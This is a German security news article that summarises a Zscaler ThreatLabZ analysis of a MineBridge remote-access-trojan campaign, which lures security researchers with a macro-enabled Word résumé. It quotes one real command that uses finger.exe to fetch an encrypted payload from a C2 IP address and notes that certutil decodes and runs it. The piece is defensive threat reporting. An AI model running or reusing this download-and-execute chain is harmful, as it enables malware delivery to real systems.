Remote-Access-Trojaner „MineBridge“ ködert mit neuer Social-Engineering-Taktik

Der Remote-Access-Trojaner „MineBridge“ ist laut dem ThreatLabZ-Team von Zscaler im Januar wieder mit einer neuen Kampagne aufgetaucht, die ihre Payload über Makros in Word-Dokumenten verbreitet. Als Köder wird dabei ein Word-File in Form eines Lebenslaufs eines Bewerbers für den Posten eines Senior-Threat-Intelligence-Analysten verwendet. Diese Art des Social-Engineerings versucht Sicherheits-Researcher anzusprechen, eine Masche, die unlängst verstärkt beobachtet wird.

Die Kampagne ist ein weiterer Beleg dafür, dass es Cyberkriminelle und andere Bedrohungsakteure in letzter Zeit besonders auf Sicherheitsforscher abgesehen haben, wie auch andere Beispiele zeigen. Der Fokus in dieser Analyse liegt auf dem Remote-Access-Trojaner (RAT) „MineBridge“, der zuletzt im März 2020 beobachtet wurde. Seitdem hat sich das Vorgehen der Bedrohungsakteure im Hinblick auf die eingesetzten Taktiken, Techniken und das Prozedere (TTPs) gewandelt.

Dennoch bestehen deutliche Gemeinsamkeiten zwischen der ursprünglichen und aktuellen Kampagne der Malware-Akteure. Wie schon im März letzten Jahres wird ein manipulierter Lebenslauf als Social-Engineering Taktik und eine vergleichbare Command & Control-Infrastruktur (C2) eingesetzt. Dahinter wird die Gruppierung TA505 vermutet, die auch für den Banking-Trojaner Dridex und die Ransomware Locky verantwortlich ist. Aufgrund des geringen Verbreitungsvolumens der bisher aufgespürten Malware-Samples scheint es sich allerdings um einen Angreifer mit moderatem Vertrauen in die Vorgehensweise zu handeln.

 

 ThreatLabZ: Technische Analyse

Das makrobasierte Word-Dokument wird mit dem MD5-Hash f95643710018c437754b8a11cc943348 verschlüsselt. Wird das Word-Dokument geöffnet und das Makro aktiviert, wird die folgende Meldung angezeigt: „Datei erfolgreich aus PDF konvertiert“. Daraufhin wird der Lebenslauf des Threat-Intelligence Analysten angezeigt. Der im Hintergrund gestartete Remote Access Trojaner konstruiert die Befehlszeile cmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> und führt sie dann mithilfe von WMI aus. Dieser Befehl nutzt das Windows-Dienstprogramm finger.exe, um verschlüsselte Inhalte von der IP-Adresse herunterzuladen und im Appdata-Verzeichnis abzulegen. Der verschlüsselte Inhalt wird mit dem legitimen Windows-Dienstprogramm certutil.exe entschlüsselt und ausgeführt.

Die Verwendung von finger.exe zum Herunterladen der verschlüsselten Inhalte vom Command & Control-Server ist eine der wichtigsten Veränderungen in der Vorgehensweise des RAT. In der neuen Instanz werden nun vermehrt Living-Off-the-Land-Binärdateien (LOLBins) zum Herunterladen, Entschlüsseln und Ausführen der Inhalte verwendet.

 

Fazit

Phishing-E-Mails, die manipulierte Lebensläufe enthalten, werden seit ein paar Jahren erfolgreich als Kampagnen eingesetzt. Neu ist, dass nun auch Profile von Sicherheitsforschern als Aufhänger genutzt werden. Der in diesem Fall verwendete RAT ist ein alter Bekannter, der nun mit neuen Tricks auf sich aufmerksam macht. Als Sicherheitsmaßnahme empfehlen die Zscaler-ThreatLabs-Analysten das Überprüfen der Quelle von Dokumenten, bevor diese geöffnet werden. Als zusätzliche Vorsichtsmaßnahme sollten Benutzer keine Makros für Microsoft-Office-Dateien aktivieren, die nicht von vertrauenswürdigen Quellen stammen, um so das Ausführen von bösartigem Code zu unterbinden.

 

Mehr unter: https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures

#Zscaler